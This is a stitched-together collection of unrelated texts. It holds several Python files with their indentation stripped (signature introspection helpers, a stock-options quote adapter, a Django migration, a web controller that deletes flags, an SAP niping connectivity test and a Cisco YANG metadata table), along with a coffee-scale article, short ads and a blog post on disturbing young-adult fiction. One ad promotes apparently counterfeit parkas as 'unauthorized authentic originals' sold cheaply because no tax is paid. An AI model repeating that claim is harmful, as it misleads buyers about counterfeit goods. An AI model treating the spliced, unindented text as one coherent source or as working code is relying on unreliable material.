# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import inspect
import ast
from functools import update_wrapper, partial
from weakref import WeakKeyDictionary
def get_funcsigs():
import inspect
try:
inspect.signature
except AttributeError:
import funcsigs
return funcsigs
else:
return inspect
funcsigs = get_funcsigs()
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
OrderedDict # quiet pyflakes
class _Unset(object):
__slots__ = ()
def __repr__(self):
return '<unset>'
UNSET = _Unset()
del _Unset
def noop(func):
return func
def qualname(obj):
try:
return obj.__qualname__
except AttributeError:
try:
return '{0.__module__}.{0.__name__}'.format(obj)
except AttributeError:
return repr(obj)
class OverrideableDataDesc(object):
def __init__(self, *args, **kwargs):
original = kwargs.pop('original', None)
if original is not None:
update_wrapper(self, original)
try:
self.custom_getter = kwargs.pop('get')
except KeyError:
def cg(func, **kwargs):
kwargs.update(self.parameters())
return type(self)(func, **kwargs)
self.custom_getter = cg
self.insts = WeakKeyDictionary()
super(OverrideableDataDesc, self).__init__(*args, **kwargs)
def __get__(self, instance, owner):
try:
getter = type(self.func).__get__
except AttributeError:
return self
else:
func = getter(self.func, instance, owner)
try:
return self.insts[func]
except KeyError:
pass
if func is self.func:
ret = self
else:
ret = self.custom_getter(func, original=self)
self.insts[func] = ret
return ret
def safe_get(obj, instance, owner):
try:
get = type(obj).__get__
except (AttributeError, KeyError):
return obj
return get(obj, instance, owner)
def iter_call(obj):
while True:
yield obj
try:
obj = obj.__call__
obj.__code__.co_filename
# raises if this is the __call__ method of a builtin object
except AttributeError:
return
partial_ = partial
def get_introspectable(obj, forged=True, af_hint=True, partial=True):
for obj in iter_call(obj):
try:
obj.__signature__
return obj
except AttributeError:
pass
if forged:
try:
obj._sigtools__forger
return obj
except AttributeError:
pass
if af_hint:
try:
obj._sigtools__autoforwards_hint
return obj
except AttributeError:
pass
if partial:
if isinstance(obj, partial_):
return obj
return obj
def get_ast(func):
try:
code = func.__code__
except AttributeError:
return None
try:
rawsource = inspect.getsource(code)
except (OSError, IOError):
return None
source = inspect.cleandoc('\n' + rawsource)
module = ast.parse(source)
return module.body[0]
|
Accurately weighed coffee is one of the most important parts of brewing filter coffee at home. Traditionally coffee scoops have been used at home to measure out coffee grounds, but increasingly people are choosing to grind at home, and using a scoop can lead to inconsistent brewing recipes. Weighing scales are a great alternative to measure whole coffee beans before they are ground, and will help you control your recipe and ultimately give you a more consistent cup of coffee.
Hario offer a pair of scales that are a perfect complement to your coffee brewing ritual. Both feature 0.1g accuracy, the ability to tare and an integrated timer to help craft your perfect brew.
What's wrong with my kitchen scales?
If you have traditional kitchen scales (i.e. not digital) then quite simply they will not be accurate enough.
If you do have a set of digital kitchen scales, they will typically not be sufficiently accurate as they are used for much larger volumes of ingredients where the margin of error is more forgiving. When weighing coffee, however, a margin of error of 2 grams in a 17 gram dose could lead to a swing either way of over 10% - quite a big difference when you're trying to stick to a consistent recipe.
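To put that margin of error in numbers, here's a quick sketch (plain Python, with illustrative figures — the 2 g and 0.1 g tolerances are the examples above, not specs for any particular scale):

```python
# Relative error a scale's margin of error introduces into a coffee dose.
def dose_error_percent(dose_grams, error_grams):
    return error_grams / dose_grams * 100

# A typical kitchen scale (+/- 2 g) versus a 0.1 g coffee scale, on a 17 g dose:
kitchen = dose_error_percent(17, 2)     # ~11.8% swing either way
coffee = dose_error_percent(17, 0.1)    # ~0.6% swing either way

print("kitchen scale: +/- %.1f%%" % kitchen)
print("coffee scale:  +/- %.1f%%" % coffee)
```

So the same 17 gram recipe can drift by more than a tenth of its dose on ordinary kitchen scales, while a 0.1 g scale keeps the variation well under one percent.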
|
import arrow
from ...assets import asset_factory, Option
from ...quotes import OptionQuote, Quote
from .QuoteAdapter import QuoteAdapter
from googlefinance import getQuotes
"""
Get current prices from Google Finance
"""
class GoogleFinanceQuoteAdapter(QuoteAdapter):
def __init__(self):
self._cache = {}
def _set_cache(self, quote):
self._cache[quote.asset.symbol] = quote
return quote
def get_quote(self, asset):
asset = asset_factory(asset)
if self._cache.get(asset.symbol) is not None:
return self._cache.get(asset.symbol)
if isinstance(asset, Option):
options = self.get_options(asset.underlying, asset.expiration_date)
matches = [_ for _ in options if _.asset == asset]
if len(matches) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return matches[0]
else:
google_quotes = getQuotes(asset.symbol)
if google_quotes is None or len(google_quotes) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
last_trade = google_quotes[0].get('LastTradeWithCurrency', None)
if last_trade is None or last_trade == '' or last_trade == '-':
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return Quote(quote_date=arrow.now().format('YYYY-MM-DD'), asset=asset, bid=float(last_trade)-0.01, ask=float(last_trade)+0.01)
def get_expiration_dates(self, underlying_asset=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
return sorted(list(set([asset_factory(_['s']).expiration_date for _ in (oc.calls + oc.puts)])))
def get_options(self, underlying_asset=None, expiration_date=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
underlying_quote = self.get_quote(underlying_asset)
out = []
for option in (oc.calls + oc.puts):
if arrow.get(expiration_date).format('YYMMDD') in option['s']:
quote = OptionQuote(quote_date=arrow.now().format('YYYY-MM-DD'),
asset=option['s'],
bid=float(option['b']) if option['b'] != '-' else None,
ask=float(option['a']) if option['a'] != '-' else None,
underlying_price = underlying_quote.price)
self._set_cache(quote)
out.append(quote)
return out
# the code below is from https://github.com/makmac213/python-google-option-chain
import requests
OPTION_CHAIN_URL = 'https://www.google.com/finance/option_chain'
class OptionChain(object):
def __init__(self, q):
"""
Usage:
from optionchain import OptionChain
oc = OptionChain('NASDAQ:AAPL')
# oc.calls
# oc.puts
"""
params = {
'q': q,
'output': 'json'
}
data = self._get_content(OPTION_CHAIN_URL, params)
# get first calls and puts
calls = data['calls']
puts = data['puts']
for (ctr, exp) in enumerate(data['expirations']):
# we already got the first put and call
# skip first
if ctr:
params['expd'] = exp['d']
params['expm'] = exp['m']
params['expy'] = exp['y']
new_data = self._get_content(OPTION_CHAIN_URL, params)
if new_data.get('calls') is not None:
calls += new_data.get('calls')
if new_data.get('puts') is not None:
puts += new_data.get('puts')
self.calls = calls
self.puts = puts
def _get_content(self, url, params):
response = requests.get(url, params=params)
if response.status_code == 200:
content_json = response.content
data = json_decode(content_json)
return data
import json
import token, tokenize
from io import StringIO
# using below solution fixes the json output from google
# http://stackoverflow.com/questions/4033633/handling-lazy-json-in-python-expecting-property-name
def fixLazyJson (in_text):
tokengen = tokenize.generate_tokens(StringIO(in_text.decode('ascii')).readline)
result = []
for tokid, tokval, _, _, _ in tokengen:
# fix unquoted strings
if (tokid == token.NAME):
if tokval not in ['true', 'false', 'null', '-Infinity', 'Infinity', 'NaN']:
tokid = token.STRING
tokval = u'"%s"' % tokval
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
# remove invalid commas
elif (tokid == token.OP) and ((tokval == '}') or (tokval == ']')):
if (len(result) > 0) and (result[-1][1] == ','):
result.pop()
result.append((tokid, tokval))
return tokenize.untokenize(result)
def json_decode(json_string):
try:
ret = json.loads(json_string)
except:
json_string = fixLazyJson(json_string)
ret = json.loads(json_string)
return ret
|
by Josep Lluís Mateo, Ministerio de Fomento y COAC. Barcelona, 1998.
Survey on Josep Lluís Mateo by Col·legi d’Arquitectes de Catalunya and Ministerio de Fomento. About his projects in the Netherlands and Germany as well as the architect’s native Barcelona; also includes his partnership with Marta Cervello (as MAP Architects). Essays by Aaron Betsky, Maurici Pla, Jos Bosmann, Claes Caldenby, Jaume Avellaneda and Markus Lauber; interview with Vittorio Magnago Lampugnani; biographical sketch and bibliography at rear.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-20 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20170624_0048'),
]
operations = [
migrations.AddField(
model_name='subscription',
name='paid',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='pago'),
),
migrations.AlterField(
model_name='column',
name='subscription_name',
field=models.CharField(choices=[('name', 'name'), ('email', 'email'), ('name_for_bib_number', 'name_for_bib_number'), ('gender', 'gender'), ('date_of_birth', 'date_of_birth'), ('city', 'city'), ('team', 'team'), ('shirt_size', 'shirt_size'), ('modality', 'modality'), ('ignore', 'ignore'), ('paid', 'paid')], max_length=20, verbose_name='coluna'),
),
migrations.AlterField(
model_name='modality',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
migrations.AlterField(
model_name='subscription',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
]
|
It is the best place to buy Canada Goose Outlet online, with cheap Canada Goose parkas and jackets on sale in our store. All Canada Goose items are unauthorized authentic originals: they are never officially contracted by these companies to be made, but are usually made in the same factories, with the same materials, and by the same workers that make the official retail items. We do not pay any tax, which is why they are so cheap!
|
#!/usr/bin/env python
"""
fla.gr controller for deleting flags
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2013
http://joshashby.com
joshuaashby@joshashby.com
"""
from seshat.route import autoRoute
from utils.baseHTMLObject import baseHTMLObject
from views.flags.flagDelTmpl import flagDelTmpl
import models.couch.flag.flagModel as fm
import models.couch.flag.collections.userPublicFlagsCollection as pubfc
import models.couch.flag.collections.userFlagsCollection as fc
import utils.search.searchUtils as su
@autoRoute()
class flagsDelete(baseHTMLObject):
_title = "delete flag"
__login__ = True
def GET(self):
"""
"""
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
view = flagDelTmpl(searchList=[self.tmplSearchList])
view.flag = flag
return view
def POST(self):
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
pubFlags = pubfc.userPublicFlagsCollection(self.session.id)
privFlags = fc.userFlagsCollection(self.session.id)
if flag.visibility:
pubFlags.delObject(flag.id)
privFlags.delObject(flag.id)
flag.delete()
su.updateSearch()
self.session.pushAlert("Flag `%s` deleted" % flag.title, "Bye!", "warning")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
|
Have a group of 6+? Book our Kitchen Studio just for you group or we can come to you. Call us at (978) 969-6088 to learn more.
|
#!/usr/bin/env python2
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# The library was designed and developed by Martin Gallo from
# the SecureAuth's Innovation Labs team.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# ==============
# Standard imports
import logging
from datetime import datetime
from argparse import ArgumentParser
from socket import socket, SHUT_RDWR, error as SocketError
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket
from pysap.SAPRouter import SAPRoutedStreamSocket
# Set the verbosity to 0
conf.verb = 0
# Command line options parser
def parse_options():
description = "This script is an example implementation of SAP's niping utility."
usage = "%(prog)s [options] [mode] -H <remote host>"
parser = ArgumentParser(usage=usage, description=description, epilog=pysap.epilog)
mode = parser.add_argument_group("Running mode")
mode.add_argument("-s", "--start-server", dest="server", action="store_true",
help="Start server")
mode.add_argument("-c", "--start-client", dest="client", action="store_true",
help="Start client")
target = parser.add_argument_group("Target")
target.add_argument("-H", "--host", dest="host", help="Host")
target.add_argument("-S", "--port", dest="port", type=int, default=3298,
help="Port [%(default)d]")
target.add_argument("--route-string", dest="route_string",
help="Route string for connecting through a SAP Router")
misc = parser.add_argument_group("Misc options")
misc.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Verbose output")
misc.add_argument("-B", "--buffer-size", dest="buffer_size", type=int, default=1000,
help="Size of data-buffer [%(default)d]")
misc.add_argument("-L", "--loops", dest="loops", type=int, default=10,
help="Number of loops [%(default)d]")
options = parser.parse_args()
if not options.server and not options.client:
parser.error("Running mode is required")
if options.client and not (options.host or options.route_string):
parser.error("Remote host is required for starting a client")
return options
def client_mode(options):
""""Implements the niping client running mode
:param options: option set from the command line
:type options: Values
"""
times = []
p = Raw("EYECATCHER" + "\x00" * (options.buffer_size - 10))
try:
# Establish the connection
conn = SAPRoutedStreamSocket.get_nisocket(options.host,
options.port,
options.route_string)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect to server o.k.")
# Send the messages
for i in range(options.loops):
# Send the packet and grab the response
start_time = datetime.now()
r = conn.sr(p)
end_time = datetime.now()
# Check the response
if str(r.payload) != str(p):
logging.info("[-] Response on message {} differs".format(i))
# Calculate and record the elapsed time
times.append(end_time - start_time)
# Close the connection properly
conn.send(Raw())
conn.close()
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
if times:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("send and receive {} messages (len {})".format(len(times), options.buffer_size))
# Calculate the stats
times = [x.total_seconds() * 1000 for x in times]
times_min = min(times)
times_max = max(times)
times_avg = float(sum(times)) / max(len(times), 1)
times_tr = float(options.buffer_size * len(times)) / float(sum(times))
times2 = [x for x in times if x not in [times_min, times_max]]
times2_avg = float(sum(times2)) / max(len(times2), 1)
times2_tr = float(options.buffer_size * len(times2)) / float(sum(times2))
# Print the stats
logging.info("")
logging.info("------- times -----")
logging.info("avg {:8.3f} ms".format(times_avg))
logging.info("max {:8.3f} ms".format(times_max))
logging.info("min {:8.3f} ms".format(times_min))
logging.info("tr {:8.3f} kB/s".format(times_tr))
logging.info("excluding max and min:")
logging.info("av2 {:8.3f} ms".format(times2_avg))
logging.info("tr2 {:8.3f} kB/s".format(times2_tr))
logging.info("")
def server_mode(options):
""""Implements the niping server running mode
:param options: option set from the command line
:type options: Values
"""
if not options.host:
options.host = "0.0.0.0"
sock = socket()
try:
sock.bind((options.host, options.port))
sock.listen(0)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("ready for connect from client ...")
while True:
sc, sockname = sock.accept()
client = SAPNIStreamSocket(sc)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect from host '{}', client hdl {} o.k.".format(sockname[0], client.fileno()))
try:
while True:
r = client.recv()
client.send(r.payload)
except SocketError:
pass
finally:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("client hdl {} disconnected ...".format(client.fileno()))
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
finally:
sock.shutdown(SHUT_RDWR)
sock.close()
# Main function
def main():
options = parse_options()
level = logging.INFO
if options.verbose:
level = logging.DEBUG
logging.basicConfig(level=level, format='%(message)s')
if options.buffer_size < 10:
logging.info("[*] Using minimum buffer size of 10 bytes")
options.buffer_size = 10
# Client running mode
if options.client:
client_mode(options)
# Server running mode
elif options.server:
server_mode(options)
if __name__ == "__main__":
main()
|
ADD A FIXED WINDOW PANEL. Let more light into your shed with a new window.
For more info call us at: 1-800-830-8033.
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
False,
[
_MetaInfoClassMember('entry', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Single Pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('accepts', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to accept
''',
'accepts',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-long', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Long Format
''',
'deliver_list_long',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-short', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Short Format
''',
'deliver_list_short',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination IP Address
''',
'destination_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Key Type
''',
'destination_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-value', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Port/ICMP Type/IGMP Type
''',
'destination_value',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('drops', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to drop
''',
'drops',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('flow-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flow type
''',
'flow_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('ifib-program-time', ATTRIBUTE, 'str' , None, None,
[], [],
''' ifib program time in netio
''',
'ifib_program_time',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-handle', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Interface Handle
''',
'intf_handle',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface Name
''',
'intf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-fgid', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is FGID or not
''',
'is_fgid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-syn', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is SYN
''',
'is_syn',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l3protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 3 Protocol
''',
'l3protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l4protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 4 Protocol
''',
'l4protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('listener-tag', ATTRIBUTE, 'str' , None, None,
[], [],
''' Listener Tag
''',
'listener_tag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('local-flag', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Local Flag
''',
'local_flag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('min-ttl', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Minimum TTL
''',
'min_ttl',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('opcode', ATTRIBUTE, 'str' , None, None,
[], [],
''' Opcode
''',
'opcode',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('pending-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' pending ifib queue delay
''',
'pending_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('sl-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' sl_ifibq delay
''',
'sl_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source IP Address
''',
'source_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-port', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source port
''',
'source_port',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vid', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' VRF ID
''',
'vid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vrf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' VRF Name
''',
'vrf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'entry',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds.SliceId' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId',
False,
[
_MetaInfoClassMember('slice-name', ATTRIBUTE, 'str' , None, None,
[], [b'[\\w\\-\\.:,_@#%$\\+=\\|;]+'],
''' Type value
''',
'slice_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('entry', REFERENCE_LIST, 'Entry' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
[], [],
''' Data for single pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-id',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds',
False,
[
_MetaInfoClassMember('slice-id', REFERENCE_LIST, 'SliceId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId',
[], [],
''' slice types
''',
'slice_id',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-ids',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], [b'([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('slice-ids', REFERENCE_CLASS, 'SliceIds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds',
[], [],
''' Slice specific
''',
'slice_ids',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node',
[], [],
''' Per node slice
''',
'node',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib' : {
'meta_info' : _MetaInfoClass('LptsIfib',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes',
[], [],
''' Node ifib database
''',
'nodes',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'lpts-ifib',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
}
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId.Entry']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node']['meta_info']
_meta_table['LptsIfib.Nodes.Node']['meta_info'].parent =_meta_table['LptsIfib.Nodes']['meta_info']
_meta_table['LptsIfib.Nodes']['meta_info'].parent =_meta_table['LptsIfib']['meta_info']
|
Nichole Giles, YA Author: Newsflash: All YA Books are Disturbing.
On Wednesday, I questioned whether or not my son’s teacher had the right to give low marks to a short story based on the fact that she found the premise disturbing.
Here’s the thing. They should. They really should. But that doesn’t mean they do.
If my son’s teacher is smart, she would have read, I don’t know, maybe, The Hunger Games. Or, To Kill a Mockingbird, or The Scarlet Letter, Lord of the Flies, Shakespeare, or any number of the current popular Vampire/werewolf/paranormal/fantasy/dystopian books. But maybe she’s not a fan of the fantastical. Maybe she prefers YA issue books. Still.
Here’s the thing: ALL those books are disturbing in one way or another. Heck, being a teenager is disturbing. They read about post apocalyptic societies in which children are forced to fight to the death. About deadly creatures who roam earth, right under the noses of the clueless public. They read about addiction, abuse, neglect, cruelty, and all manner of emotional trauma. They read about *gasp* the kind of true love that makes you do stupid things—like ask to become a vampire. Or a faery.
Show me a YA book that isn’t disturbing in one way or another, and I’ll show you a YA book only being read by adults. And not by many.
Is it really a shocker to discover that these teen readers write similar stories?
But then, I say that assuming the teacher in question has read any of these books. Because, as mentioned above, just because she should doesn’t mean she has. Or does. Or will. However, if she hasn’t, how is she able to fairly grade papers written by the kids who are her students? The ones who read disturbing books?
As mentioned earlier, I respect that teacher’s ability to grade papers based on opinion. Even when the technical aspects have been efficiently handled. But I am also troubled by her choice to discourage any kid from expressing their creativity in the best way they know by downgrading their paper for being disturbing.
I believe kids have a hundred times more power than adults behind their creative instincts, because they have not yet learned to care what others think of their work. They write, dance, create, play, and dream just because they can. It is only as they become adults and have numerous people working to convince them that they aren’t good enough, that they actually start to believe it’s true.
Again, I ask you. Does an adult—especially a teacher—have the right to begin the cycle of “I’m not good enough” for a child? Even if that child is on the verge of adulthood?
Adults do it all the time. We try not to, I try not to--but isn't that what domesticating kids is about?
"Sit still . . . stop talking . . . walk in a straight line, and would you stop laughing so loud?!"
Many kids are outside-the-box thinkers, a lot of adults are too, but a lot of teachers are inside-the-box thinkers (not all of them, to be fair). Directions must be followed to a tee, and order is more important than creativity.
Sorry, am I ranting too much? I'm sorry about what happened with your son's story, but now I'm curious: What did he write about that was so disturbing?
oh man, that would make me so mad. Nobody has the right to stifle someone's creativity. What if that person becomes discouraged and never tries again?
Finding the premise disturbing is not an acceptable excuse for giving a low grade. But ... the same thing happened to me. I did an art project in my junior year. Anyway, the teacher gave me the lowest grade without actually failing me. When I asked her why, she said she didn't think I should be focusing on that subject matter -- even though the assignment was to do whatever we wanted to do in that medium.
Teachers have an amazing ability to inspire their students. All it takes is one comment to either encourage or deflate. I waited a hundred years to start writing. Okay, maybe not a hundred, but a whole bunch because of the influence of teachers. I hope that your son is able to find the positive influence he needs to continue creating. Thanks for your post.
I think the fact that the teacher found it disturbing means that some good writing was going on. I think you should challenge her on it.
I had this same thought. All YA is disturbed. Truthfully, isn't almost all story disturbing? It always has conflict--rising conflict--and the stories that really change us and make us think are the ones that dare.
